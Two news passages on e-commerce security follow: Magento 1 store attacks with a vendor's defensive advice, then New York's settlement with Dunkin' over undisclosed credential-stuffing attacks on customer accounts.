Sansec’s Threat Research Team, which revealed the attacks, suggested that attackers may have found a new way to compromise their servers — potentially exploiting a zero-day in Magento 1 that was advertised online. It warned that if this is the case, 95,000 stores could also be exposed to the exploit, as they are running Magento 1.
James Allen-Lewis, development director at Sonassi, commented: “Unfortunately, this incident should not come as a surprise. As far back as last year, warnings had been issued about the likelihood of attacks on Magento 1 stores, and as the deadline to end-of-life grew closer, these warnings have gotten louder. While cyber-threats do exist on Magento 2, those remaining on Magento 1 are no longer supported with security patches, and therefore a prime target for hackers.”
Allen-Lewis added that due to the accelerated shift to e-commerce during the COVID-19 pandemic, it is more important than ever that retailers secure their digital shopping sites. The prospect of a second wave of the virus and localized lockdowns are likely to boost demand on this channel even further.
Allen-Lewis said: “It’s critical retailers deploy basic cybersecurity best practices. Simple things such as regular updates to your passwords and multi-factor authentication are often overlooked. Additionally, retailers should be locking down the administrator interface by IP address. This simple change makes it much harder for hackers to get near this critical part of the store.
“Many attacks involve files being added or changed on a website. It is vital you monitor your log for any suspicious file activity. Furthermore, run regular audits on admin accounts and keep admin access to a minimum. You should always know who has access to your website.
“Finally, ensure you scan your website regularly for indicators of compromise. This will give you a much stronger insight into the security posture of your business.”
The suit was filed against Dunkin' Brands Group Inc. in state Supreme Court in Manhattan in September last year by the state of New York's attorney general Letitia James.
James alleged that Dunkin' neglected to inform customers of cyber-attacks that took place between 2015 and 2018 that compromised the accounts of thousands of customers.
Attackers used automated credential stuffing and brute-force attacks to steal money from customer accounts created through Dunkin's free mobile app or website.
James alleged that Dunkin' failed to inform customers that attacks had taken place, despite being warned repeatedly about the issue by its app developer.
During the summer of 2015, Dunkin's app developer provided the company with a list of 19,715 accounts that had been compromised by attacks over a sample period of just five days, but the donut seller failed to tell customers or upgrade its security, according to the lawsuit.
When the lawsuit was filed, Dunkin's chief communications officer Karen Raskopf told Infosecurity Magazine that there was "no basis for these claims" and that the company looked forward "to proving our case in court."
However, on Tuesday, Dunkin' Brands Group Inc. agreed to $650,000 in fines and costs to settle the lawsuit, according to Reuters. The company further acquiesced to carrying out an upgrade of its security protocols.
Under the terms of the settlement, Dunkin' customers will be notified of the cyber-attacks that took place between 2015 and 2018 and will be advised to reset their passwords.
Dunkin' has further agreed to give refunds for unauthorized transactions that occurred on their Dunkin' brand stored-value cards.
Dunkin' has not confirmed or denied any wrongdoing in relation to the cyber-attacks. The settlement of the suit requires a judge's approval.
The company, which is based in Canton, Massachusetts, has around 8,000 branches nationally, including 1,000 Dunkin' locations in New York.
Announcing the settlement, James punned: "Not only will customers be reimbursed for lost funds, but we are ensuring the company’s dangerous brew of lax security and negligence comes to an end.”